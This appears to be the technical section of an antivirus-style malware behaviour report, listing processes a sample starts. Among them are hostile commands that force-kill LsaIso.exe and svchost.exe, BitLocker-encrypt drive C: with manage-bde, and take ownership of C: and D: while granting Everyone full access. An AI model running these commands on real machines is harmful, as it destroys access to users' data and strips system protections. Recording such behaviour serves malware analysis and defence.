Техническая информация
- '<SYSTEM32>\taskkill.exe' /F /T /IM LsaIso.exe
- '<SYSTEM32>\taskkill.exe' /F /T /IM svchost.exe
- <SYSTEM32>\dwm.exe
- <SYSTEM32>\wudfhost.exe
- <SYSTEM32>\wbem\wmiprvse.exe
- <SYSTEM32>\svchost.exe
- ClassName: '' WindowName: ''
- ClassName: '' WindowName: 'View Available Networks'
- '<SYSTEM32>\manage-bde.exe' -on C: -EncryptionMethod AES-256
- '<SYSTEM32>\takeown.exe' /f D:\ /r /d Y
- '<SYSTEM32>\icacls.exe' D:\ /grant Everyone:F /t /c /l
- '<SYSTEM32>\icacls.exe' C:\ /grant Everyone:F /t /c /l
- '<SYSTEM32>\takeown.exe' /f C:\ /r /d Y
- '<SYSTEM32>\svchost.exe' -k DcomLaunch
- '<SYSTEM32>\svchost.exe' -k RPCSS
- '<SYSTEM32>\svchost.exe' -k LocalSystemNetworkRestricted